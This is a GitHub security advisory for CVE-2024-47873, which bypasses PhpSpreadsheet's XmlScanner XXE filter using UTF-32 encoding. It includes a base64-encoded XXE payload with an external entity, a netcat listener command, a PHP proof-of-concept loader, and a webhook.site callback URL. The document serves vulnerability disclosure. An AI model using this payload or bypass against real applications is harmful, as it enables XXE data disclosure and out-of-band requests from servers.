GHSA-JW4X-V69F-HH5W
Vulnerability from github – Published: 2024-11-18 20:01 – Updated: 2025-03-06 18:15Summary
The XmlScanner class has a scan method which should prevent XXE attacks.
However, the regexes used in the scan method and the findCharSet method can be bypassed by using UCS-4 and encoding guessing as described in https://www.w3.org/TR/xml/#sec-guessing-no-ext-info.
Details
The scan method converts the input in the UTF-8 encoding if it is not already in the UTF-8 encoding with the toUtf8 method.
Then, the scan method uses a regex which would also work with 16-bit encoding.
However, the regexes from the findCharSet method, which is used for determining the current encoding can be bypassed by using an encoding which has more than 8 bits, since the regex does not expect null bytes, and the XML library will also autodetect the encoding as described in https://www.w3.org/TR/xml/#sec-guessing-no-ext-info.
A payload for the workbook.xml file can for example be created with CyberChef&input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgcjppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.).
If you open an Excel file containing the payload from the link above stored in the workbook.xml file with PhpSpreadsheet, you will receive an HTTP request on 127.0.0.1:12345. You can test that an HTTP request is created by running the nc -nlvp 12345 command before opening the file containing the payload with PhpSpreadsheet.
PoC
- Create a new folder.
- Run the
composer require phpoffice/phpspreadsheetcommand in the new folder. - Create an
index.phpfile in that folder with the following content:
<?php
require 'vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Writer\Xlsx;
$spreadsheet = new Spreadsheet();
$inputFileType = 'Xlsx';
$inputFileName = './payload.xlsx';
/** Create a new Reader of the type defined in $inputFileType **/
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);
/** Advise the Reader that we only want to load cell data **/
$reader->setReadDataOnly(true);
$worksheetData = $reader->listWorksheetInfo($inputFileName);
foreach ($worksheetData as $worksheet) {
$sheetName = $worksheet['worksheetName'];
echo "<h4>$sheetName</h4>";
/** Load $inputFileName to a Spreadsheet Object **/
$reader->setLoadSheetsOnly($sheetName);
$spreadsheet = $reader->load($inputFileName);
$worksheet = $spreadsheet->getActiveSheet();
print_r($worksheet->toArray());
}
- Run the following command:
php -S 127.0.0.1:8080 - Add the payload.xlsx file, which contains a payload similar to the payload from the details section, but with the URL
https://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50ainstead of thehttp://127.0.0.1:12345/ext.dtdURL, in the folder and open https://127.0.0.1:8080 in a browser. You will see an HTTP request on https://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a.
Impact
An attacker can bypass the sanitizer and achieve an XXE attack.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.29.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.1.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.3.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.0"
},
{
"fixed": "3.4.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpexcel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.8.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-47873"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-18T20:01:20Z",
"nvd_published_at": "2024-11-18T17:15:11Z",
"severity": "HIGH"
},
"details": "### Summary\nThe [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method which should prevent XXE attacks.\n\nHowever, the regexes used in the `scan` method and the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method can be bypassed by using UCS-4 and encoding guessing as described in \u003chttps://www.w3.org/TR/xml/#sec-guessing-no-ext-info\u003e.\n\n\n### Details\nThe `scan` method converts the input in the UTF-8 encoding if it is not already in the UTF-8 encoding with the [`toUtf8` method](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L76).\nThen, the `scan` method uses a [regex](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L79) which would also work with 16-bit encoding.\n\nHowever, the regexes from the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method, which is used for determining the current encoding can be bypassed by using an encoding which has more than 8 bits, since the regex does not expect null bytes, and the XML library will also autodetect the encoding as described in \u003chttps://www.w3.org/TR/xml/#sec-guessing-no-ext-info\u003e.\n\nA payload for the `workbook.xml` file can for example be created with [CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text(\u0027UTF-32BE%20(12001)\u0027)\u0026input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgcjppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.).\nIf you open an Excel file containing the payload from the link above stored in the `workbook.xml` file with PhpSpreadsheet, you will receive an HTTP request on `127.0.0.1:12345`. You can test that an HTTP request is created by running the `nc -nlvp 12345` command before opening the file containing the payload with PhpSpreadsheet.\n\n### PoC\n\n- Create a new folder.\n- Run the `composer require phpoffice/phpspreadsheet` command in the new folder.\n- Create an `index.php` file in that folder with the following content:\n```PHP\n\u003c?php\nrequire \u0027vendor/autoload.php\u0027;\n\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Xlsx;\n\n$spreadsheet = new Spreadsheet();\n\n$inputFileType = \u0027Xlsx\u0027;\n$inputFileName = \u0027./payload.xlsx\u0027;\n\n/** Create a new Reader of the type defined in $inputFileType **/\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader($inputFileType);\n/** Advise the Reader that we only want to load cell data **/\n$reader-\u003esetReadDataOnly(true);\n\n$worksheetData = $reader-\u003elistWorksheetInfo($inputFileName);\n\nforeach ($worksheetData as $worksheet) {\n\n$sheetName = $worksheet[\u0027worksheetName\u0027];\n\necho \"\u003ch4\u003e$sheetName\u003c/h4\u003e\";\n/** Load $inputFileName to a Spreadsheet Object **/\n$reader-\u003esetLoadSheetsOnly($sheetName);\n$spreadsheet = $reader-\u003eload($inputFileName);\n\n$worksheet = $spreadsheet-\u003egetActiveSheet();\nprint_r($worksheet-\u003etoArray());\n\n}\n```\n- Run the following command: `php -S 127.0.0.1:8080`\n- Add the [payload.xlsx](https://github.com/user-attachments/files/17334157/payload.xlsx) file, which contains a payload similar to the payload from the details section, but with the URL `https://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50a` instead of the `http://127.0.0.1:12345/ext.dtd` URL, in the folder and open \u003chttps://127.0.0.1:8080\u003e in a browser. You will see an HTTP request on \u003chttps://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a\u003e.\n\n### Impact\nAn attacker can bypass the sanitizer and achieve an [XXE attack](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).",
"id": "GHSA-jw4x-v69f-hh5w",
"modified": "2025-03-06T18:15:31Z",
"published": "2024-11-18T20:01:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jw4x-v69f-hh5w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47873"
},
{
"type": "PACKAGE",
"url": "https://github.com/PHPOffice/PhpSpreadsheet"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php"
},
{
"type": "WEB",
"url": "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing"
},
{
"type": "WEB",
"url": "https://www.w3.org/TR/xml/#sec-guessing-no-ext-info"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "XmlScanner bypass leads to XXE"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.